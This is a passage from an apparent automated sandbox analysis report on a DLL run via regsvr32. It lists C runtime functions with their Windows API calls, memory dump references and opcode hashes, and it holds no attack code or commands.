                                                                    • SetLastError.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2DE0
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B2DB4
                                                                    • free.LIBCMT ref: 00007FF8CA9B2DD7
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8CA9B2DC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                    • String ID:
                                                                    • API String ID: 3106088686-0
                                                                    • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                    • Instruction ID: d6e873756f187b410f3c7bf719c27dd47755018fb7af188ef42b8327794329c8
                                                                    • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                    • Instruction Fuzzy Hash: 05017520A09F4292FB24EF65B46E3782292FF887D4B1442B4C93D923D1EE3CE44DC212
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B9DF8 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 1012874770-0
                                                                    • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                    • Instruction ID: 9bd29c4a30ccc5768bfc314c5ad19dd604b2a015466ce055241fe6f161bcbc14
                                                                    • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                    • Instruction Fuzzy Hash: 3601AC12958A4291EF74DFE1F4BB1751361AF84784F4420B2E62EC7992CF5DF8988210
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B9E90 Relevance: 7.7, APIs: 6, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                    • Instruction ID: 35f165ea4b38a58693d638e63056450bbe4db89a95884c334216b3b1097b8659
                                                                    • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                    • Instruction Fuzzy Hash: A0B1B032B19B458AEB30DF62F4565AA77A0FB85784F401531EA9D83B95DF3CD109C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B60B0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$Sleep_errno
                                                                    • String ID:
                                                                    • API String ID: 2081351063-0
                                                                    • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                    • Instruction ID: f0a047196ad123c53fd15b09046efe8c4ce39a5ea5ace0b4bf3645c5523b503e
                                                                    • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                    • Instruction Fuzzy Hash: 35312F21A0974285EB659F16F8BA2BD66A1AF84FC4F448075DF2D87796DE3CF808C340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B72D4 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B72FD
                                                                    • DecodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B730C
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B7389
                                                                      • Part of subcall function 00007FF8CA9B318C: realloc.LIBCMT ref: 00007FF8CA9B31B7
                                                                      • Part of subcall function 00007FF8CA9B318C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B7379,?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2), ref: 00007FF8CA9B31D3
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B7398
                                                                    • EncodePointer.KERNEL32(?,?,?,00007FF8CA9B73E5,?,?,?,?,00007FF8CA9B34D2,?,?,?,00007FF8CA9B21CB), ref: 00007FF8CA9B73A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                    • String ID:
                                                                    • API String ID: 1310268301-0
                                                                    • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                    • Instruction ID: c2705001ea33ae3b14178d50083321177491f156f4f6e4ca9ede606577407618
                                                                    • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                    • Instruction Fuzzy Hash: 35219C11B0A74250EB24EF21F46F1BAB291BB45BC0F4459B5EA2D9B796DE3CE08D8300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B71A4 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                    • String ID:
                                                                    • API String ID: 1310268301-0
                                                                    • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                    • Instruction ID: 0a14e4d5c13a2af4851687da1d2da75f2523d93167d4b9adfce9c745fa466dea
                                                                    • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                    • Instruction Fuzzy Hash: FC218311B0AB8264EF24EF11B56F2B9B251AB457C0F4845B5ED6D87B95DE3CE449C300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B3AEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$__initmbctable
                                                                    • String ID: @Ce
                                                                    • API String ID: 2804101511-1767366083
                                                                    • Opcode ID: 62b67f3d166044e4c3a65fa2a8f4440ca774743433b5403a5dc793ed1f544cce
                                                                    • Instruction ID: bb4a00107f7effc4060bdc03b57bc34ef665264bb9862552ced21198c10c4512
                                                                    • Opcode Fuzzy Hash: 62b67f3d166044e4c3a65fa2a8f4440ca774743433b5403a5dc793ed1f544cce
                                                                    • Instruction Fuzzy Hash: 42317221E0CB5295FB60DF21F86E37A6790AF45BC4F4845B5DA6C86A9ADF3CE04C8300
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B3310 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF8CA9B3359,?,?,00000028,00007FF8CA9B6C7D,?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19), ref: 00007FF8CA9B331F
                                                                    • GetProcAddress.KERNEL32(?,?,000000FF,00007FF8CA9B3359,?,?,00000028,00007FF8CA9B6C7D,?,?,00000000,00007FF8CA9B30C0,?,?,00000000,00007FF8CA9B6B19), ref: 00007FF8CA9B3334
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 1646373207-1276376045
                                                                    • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                    • Instruction ID: 0b5b394ec9b521a7eab3f4baba05d43146a8aaa85e1588b51c4d68dccacb53b5
                                                                    • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                    • Instruction Fuzzy Hash: 43E0EC50F19B0251EF19AF50B8AA23512906F58BD4B8864B9C87F863A1EE6CA69CC211
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B575C Relevance: 6.4, APIs: 5, Instructions: 134COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B309C: Sleep.KERNEL32(?,?,00000000,00007FF8CA9B6B19,?,?,00000000,00007FF8CA9B6BC3,?,?,?,?,?,?,00000000,00007FF8CA9B2DC8), ref: 00007FF8CA9B30D2
                                                                    • free.LIBCMT ref: 00007FF8CA9B58A5
                                                                    • free.LIBCMT ref: 00007FF8CA9B58C1
                                                                      • Part of subcall function 00007FF8CA9B6550: RtlCaptureContext.KERNEL32 ref: 00007FF8CA9B658F
                                                                      • Part of subcall function 00007FF8CA9B6550: IsDebuggerPresent.KERNEL32 ref: 00007FF8CA9B662D
                                                                      • Part of subcall function 00007FF8CA9B6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6637
                                                                      • Part of subcall function 00007FF8CA9B6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FF8CA9B6642
                                                                      • Part of subcall function 00007FF8CA9B6550: GetCurrentProcess.KERNEL32 ref: 00007FF8CA9B6658
                                                                      • Part of subcall function 00007FF8CA9B6550: TerminateProcess.KERNEL32 ref: 00007FF8CA9B6666
                                                                    • free.LIBCMT ref: 00007FF8CA9B58D6
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    • free.LIBCMT ref: 00007FF8CA9B58F5
                                                                    • free.LIBCMT ref: 00007FF8CA9B5911
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                    • String ID:
                                                                    • API String ID: 2294642566-0
                                                                    • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                    • Instruction ID: a68abbcc407416e8ffa94f847a612090fed8797fe12f9611518262b99e97d7e8
                                                                    • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                    • Instruction Fuzzy Hash: 19519336A04B8582EB20DF1AF86A16E2395FB84BD8F484075DE5E87794DE3CD94AC340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B5B84 Relevance: 6.2, APIs: 4, Instructions: 186COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _getptd
                                                                    • String ID:
                                                                    • API String ID: 3186804695-0
                                                                    • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                    • Instruction ID: 7580e35202da13dac799201fff07d7036e4f70617af039750143aeca17fb971d
                                                                    • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                    • Instruction Fuzzy Hash: 6D819F72A0978296DB24DF25F1997AA73A0FB88784F504135DB6E87B94DF3CE458CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B61F0 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$DecodePointer_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 4201827665-0
                                                                    • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                    • Instruction ID: 44423682b168f45c7f39a9bf0c7878036c9b13d083776c56db5ffff7b0162051
                                                                    • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                    • Instruction Fuzzy Hash: FE517E31A09B9286FB64EF25B86A7BA2291FF447C4F1040B5DA6EC7791DE7CF4488700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BF9E8 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointercalloc
                                                                    • String ID:
                                                                    • API String ID: 1531210114-0
                                                                    • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                    • Instruction ID: 16dc616159ff06c0bd2f0b8c8c39da6bede9d8a1d6f02c63b3d296dd09449c09
                                                                    • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                    • Instruction Fuzzy Hash: FC218362B0974245FB289F65B43A3BA6291AF44BC4F488174DF5E87786EF3CE8188700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B539C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B53B2
                                                                    • free.LIBCMT ref: 00007FF8CA9B53D7
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    • _lock.LIBCMT ref: 00007FF8CA9B53F2
                                                                    • free.LIBCMT ref: 00007FF8CA9B5438
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 3188102813-0
                                                                    • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                    • Instruction ID: 910b5c6c8dc4b2558d66f1aa0a526ae1a2e5d261d83a5d24e5f568a1406d5c71
                                                                    • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                    • Instruction Fuzzy Hash: 70115E21A4A70285FF74AFB5F47B3B822919F80B84F4451B5D73FC62D5DE6CA8498321
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B2C94 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection$Freefree
                                                                    • String ID:
                                                                    • API String ID: 1250194111-0
                                                                    • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                    • Instruction ID: 29f3072bf3f1805a2760f9f19480944e964f1258f1ac6d66fcc4f8a7e2cb7777
                                                                    • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                    • Instruction Fuzzy Hash: F3119D32E08B4286FB249F05F86A2B87760FB00BD4F5885B0DB7D82695CF3CE5999701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9B544C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$Sleep_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 2111406555-0
                                                                    • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                    • Instruction ID: 70f6688b16753841dbf9ef5e939629408e09a26fa710f064e0cbd57322ecffed
                                                                    • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                    • Instruction Fuzzy Hash: 49015E21A0974286FB646F75F4677AD6261EF84BC4F448074D72E973C6CE3CA8588351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF8CA9BBB50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
